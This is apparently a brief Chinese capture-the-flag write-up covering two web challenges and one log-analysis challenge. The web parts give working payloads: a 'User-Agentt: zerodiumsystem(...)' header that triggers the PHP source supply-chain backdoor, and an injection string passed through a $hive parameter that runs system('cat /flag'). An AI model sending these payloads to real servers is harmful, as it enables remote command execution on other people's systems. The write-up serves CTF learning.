Web
签到
PHP 源码供应链攻击
HTTP header中加一项:
User-Agentt: zerodiumsystem(“cat /flag”);
unsetme
unset触发__unset->clear。类似CVE-2020-5203,用$hive[]绕过过滤。
payload:
$hive[%27abc%27]);system(%27cat%20/flag%27);//%27]
Misc
你会日志分析吗
取最后select flag长度为377的记录,将字符串提取出来,base64解码得到flag。